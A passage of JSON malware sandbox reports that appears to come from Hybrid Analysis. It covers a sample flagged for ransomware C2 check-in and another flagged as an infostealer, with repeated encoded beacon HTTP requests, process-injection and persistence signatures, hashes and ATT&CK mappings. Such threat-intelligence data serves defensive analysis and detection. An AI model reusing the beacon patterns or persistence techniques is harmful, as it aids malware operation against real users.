/396/104.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?47675gf15ic765e4bdiec6bd3d632g:/`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"9034\" in header \"GET /396/104.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?47675gf15ic765e4bdiec6bd3d632g:/`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /396/104.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?47675gf15ic765e4bdiec6bd3d632g:/`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"/904/267\" in header \"GET /904/267.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?6c:de;h07fd8657f475d2577<39864i6`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /904/267.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?6c:de;h07fd8657f475d2577<39864i6`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"9034\" in header \"GET /904/267.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?6c:de;h07fd8657f475d2577<39864i6`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /904/267.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?6c:de;h07fd8657f475d2577<39864i6`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"/245/114\" in header \"GET /245/114.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?d`9e68:bg<03416;2;i`9ie66ch<27fe`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /245/114.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?d`9e68:bg<03416;2;i`9ie66ch<27fe`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"9034\" in header \"GET /245/114.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?d`9e68:bg<03416;2;i`9ie66ch<27fe`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"9e68\" in header \"GET /245/114.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?d`9e68:bg<03416;2;i`9ie66ch<27fe`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"27fe\" in header \"GET /245/114.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?d`9e68:bg<03416;2;i`9ie66ch<27fe`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /245/114.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?d`9e68:bg<03416;2;i`9ie66ch<27fe`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"/845/914\" in header \"GET /845/914.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?:74<73553<13f/448f;6:g6fd`4da96a`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /845/914.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?:74<73553<13f/448f;6:g6fd`4da96a`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"9034\" in header \"GET /845/914.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?:74<73553<13f/448f;6:g6fd`4da96a`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"13f/448f\" in header \"GET /845/914.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?:74<73553<13f/448f;6:g6fd`4da96a`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"g6fd\" in header \"GET /845/914.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?:74<73553<13f/448f;6:g6fd`4da96a`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /845/914.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?:74<73553<13f/448f;6:g6fd`4da96a`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"/350/559\" in header \"GET /350/559.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?i24ia94028bfebh4e6e88:3e7b:hcfh3`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /350/559.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?i24ia94028bfebh4e6e88:3e7b:hcfh3`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"9034\" in header \"GET /350/559.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?i24ia94028bfebh4e6e88:3e7b:hcfh3`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"3e7b\" in header \"GET /350/559.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?i24ia94028bfebh4e6e88:3e7b:hcfh3`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /350/559.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?i24ia94028bfebh4e6e88:3e7b:hcfh3`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"/184/340\" in header \"GET /184/340.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?8bc865he4;3h82hicf629d55d/f;58de`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /184/340.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?8bc865he4;3h82hicf629d55d/f;58de`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"9034\" in header \"GET /184/340.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?8bc865he4;3h82hicf629d55d/f;58de`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"58de\" in header \"GET /184/340.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?8bc865he4;3h82hicf629d55d/f;58de`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /184/340.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?8bc865he4;3h82hicf629d55d/f;58de`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"/458/753\" in header \"GET /458/753.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?7258chfa3g8836:gbc7/39/6g6;:a4:c`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /458/753.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?7258chfa3g8836:gbc7/39/6g6;:a4:c`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"9034\" in header \"GET /458/753.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?7258chfa3g8836:gbc7/39/6g6;:a4:c`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /458/753.html HTTP/1.1From: 133833061259316839Via: mndaqgy<5:6`rr?9034]mhx?7258chfa3g8836:gbc7/39/6g6;:a4:c`qneuxrwHost: mkkuei4kdsz.comConnection: Keep-Alive\"", "origin": "Network Traffic", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"ewiuer2.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"ewiuer2.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\PARAMETERS\"; Key: \"TRANSPORTS\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MAPPING\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\PSCHED\\PARAMETERS\\WINSOCK\"; Key: \"MAPPING\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\\PSCHED\"; Key: \"WINSOCK 2.0 PROVIDER ID\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\WINSOCK\"; Key: \"MAPPING\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\\TCPIP\"; Key: \"WINSOCK 2.0 PROVIDER ID\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\WINSOCK\"; Key: \"MINSOCKADDRLENGTH\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\WINSOCK\"; Key: \"MAXSOCKADDRLENGTH\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\WINSOCK\"; Key: \"USEDELAYEDACCEPTANCE\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\WINSOCK\"; Key: \"HELPERDLLNAME\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"DOMAIN\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"AUTODIALDLL\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" wrote 63049 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\ewiuer2.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ewiuer2.exe\" wrote 63049 bytes starting with PE header signature to file \"C:\\Windows\\System32\\ewiuer2.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"ewiuer2.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%APPDATA%\\ewiuer2.exe]- [targetUID: 00000000-00005716]\n \"EWIUER2.EXE.67A4889D.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"ewiuer2.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\ewiuer2.exe]- [targetUID: 00000000-00005716]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"ewiuer2.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 80 is sent without HTTP header\n TCP traffic to <IPv4> on port 80 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"ewiuer2.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYENABLE\"; Value: \"00000000\")\n \"ewiuer2.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYSERVER\")\n \"ewiuer2.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYOVERRIDE\")\n \"ewiuer2.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"ewiuer2.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\ewiuer2.exe\" (Handle: 160)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\ewiuer2.exe\" (Handle: 160)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\ewiuer2.exe\" (Handle: 160)\n \"ewiuer2.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\ewiuer2.exe\" (Handle: 740)\n \"ewiuer2.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\ewiuer2.exe\" (Handle: 740)\n \"ewiuer2.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\ewiuer2.exe\" (Handle: 740)\n \"ewiuer2.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\ewiuer2.exe\" (Handle: 732)\n \"ewiuer2.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\ewiuer2.exe\" (Handle: 732)\n \"ewiuer2.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\ewiuer2.exe\" (Handle: 732)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "binary-7", "type": 8, "relevance": 7, "name": "Drops executable files to the Windows system directory", "description": "File type \"PE32 executable (GUI) Intel 80386 for MS Windows\" was dropped at \"%WINDIR%\\System32\\ewiuer2.exe\"", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "suricata-2", "type": 18, "relevance": 10, "name": "Detected Suricata Alert", "description": "Detected alert \"ET MALWARE Ransom.Win32.Birele.gsg Checkin\" (SID: 2015786, Rev: 7, Severity: 1) categorized as \"Malware Command and Control Activity Detected\" (PUA/PUP/Adware)", "origin": "Suricata Alerts"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f
https://hybrid-analysis.com/sample/fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f
Hybrid Analysis - Infostealers
{"size": 86756, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f", "sha256": "fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f", "av_detect": 91, "vx_family": "Dump:Generic.Dacic.9C483F5C.A", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 1, "total_processes": 3, "total_signatures": 187, "extracted_files": [{"name": "rundll32.exe", "file_path": "%WINDIR%\\system\\rundll32.exe", "file_size": 94888, "sha256": "a6c81fba2c324fab7fbbb7a0547e32027e1b6b7ef782cdeecb7abad154792cf5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe (PID: 6120)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "notepad_.exe", "file_size": 98324, "sha256": "467f918f319472446abb0d6eeaadfe37cfb9576591f3b6ddac941eef4ffaae4d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "_.exe", "file_size": 93491, "sha256": "e3db20c5088f6b72fa90c2aa628c8d8c84c4d10e0ca10a72ce682e231464765f", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "RUNDLL32.EXE.67A47CFD.bin", "file_size": 94888, "sha256": "a6c81fba2c324fab7fbbb7a0547e32027e1b6b7ef782cdeecb7abad154792cf5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .RES Files linked with CVTRES.EXE 5.00 (Visual Studio 5) (build: 1720)", "17 .CPP Files compiled with CL.EXE 12.00 (Visual Studio 6) (build: 8168)"], "imported_objects": ["5 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 8168)", "11 .C Files compiled with CL.EXE 12.00 (Visual Studio 6) (build: 8168)", "2 .ASM Files assembled with MASM 6.13 (Visual Studio 6 SP1) (build: 7299)", "12 .OBJ Files (COFF) linked with LINK.EXE 5.12 (Visual Studio 5 SP2) (build: 8034)", "4 .OBJ Files linked with ALIASOBJ.EXE 6.00 (Internal OLDNAMES.LIB Tool) (build: 7291)"], "file_analysis": ["File contains C++ code", "File is the product of a medium codebase (17 files)"], "total_file_compositions_imports": 239}, "processes": [{"uid": "00000000-00006120", "name": "fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe", "normalized_path": "C:\\fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe", "sha256": "fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f"}, {"uid": "00000000-00005596", "parentuid": "00000000-00006120", "name": "rundll32.exe", "normalized_path": "%WINDIR%\\system\\rundll32.exe", "sha256": "a6c81fba2c324fab7fbbb7a0547e32027e1b6b7ef782cdeecb7abad154792cf5"}, {"uid": "00000000-00004140", "name": "WerFault.exe", "normalized_path": "%WINDIR%\\system32\\WerFault.exe", "command_line": "-u -p 5596 -s 792", "sha256": "08bace187a0225e10677de9aa6738a7118be3e5cad6dc45fb8d3366a61bb343c"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 4, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 2, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 2, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 3, "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, 